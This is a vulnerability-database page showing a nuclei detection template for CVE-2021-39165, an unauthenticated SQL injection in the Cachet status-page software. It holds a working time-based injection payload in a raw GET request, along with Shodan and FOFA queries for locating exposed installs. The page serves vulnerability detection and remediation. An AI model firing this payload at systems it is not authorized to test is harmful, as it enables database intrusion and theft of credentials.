Lucene search
K

Cachet <=2.3.18 - SQL Injection

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 113 Views

Cachet <=2.3.18 - SQL Injection allows unauthorized access and data leakag

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Improper Authentication in Chachethq Cachet
20 Sep 202322:19
githubexploit
GithubExploit
Exploit for Improper Authentication in Chachethq Cachet
15 Mar 202218:14
githubexploit
ATTACKERKB
CVE-2021-39165
26 Aug 202121:15
attackerkb
Circl
CVE-2021-39165
27 Aug 202100:27
circl
CNNVD
Github Cachet SQL注入漏洞
26 Aug 202100:00
cnnvd
CVE
CVE-2021-39165
26 Aug 202120:25
cve
Cvelist
CVE-2021-39165 Unauthenticated SQL Injection
26 Aug 202120:25
cvelist
Github Security Blog
Unauthenticated SQL Injection in Cachet
30 Aug 202116:12
github
NVD
CVE-2021-39165
26 Aug 202121:15
nvd
OSV
GHSA-79MG-4W23-4FQC Unauthenticated SQL Injection in Cachet
30 Aug 202116:12
osv
Rows per page
id: CVE-2021-39165

info:
  name: Cachet <=2.3.18 - SQL Injection
  author: tess
  severity: medium
  description: |
    Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet <https://github.com/CachetHQ/Cachet> is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor.
  reference:
    - https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html
    - https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6
    - https://github.com/W0rty/CVE-2021-39165/blob/main/exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39165
    - https://github.com/fiveai/Cachet/security/advisories/GHSA-79mg-4w23-4fqc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-39165
    cwe-id: CWE-287
    epss-score: 0.09752
    epss-percentile: 0.94949
    cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: chachethq
    product: cachet
    shodan-query: http.favicon.hash:-1606065523
    fofa-query: icon_hash=-1606065523
  tags: time-based-sqli,cve,cve2021,cachet,sqli,chachethq,vuln

http:
  - raw:
      - |
        @timeout: 20s
        GET /api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))-- HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "pagination") && contains(body, "data")'
        condition: and
# digest: 4b0a00483046022100ec187990fd9f4e17e16859abdfd465bf1d05ba3556d9126b0748423a7e5722a8022100f7487c9fb03ca78781c7ff6eea575ca278c431e0dc2225d99e45681e22a4fcdb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 25
CVSS 3.16.5 - 8.1
EPSS0.09752
113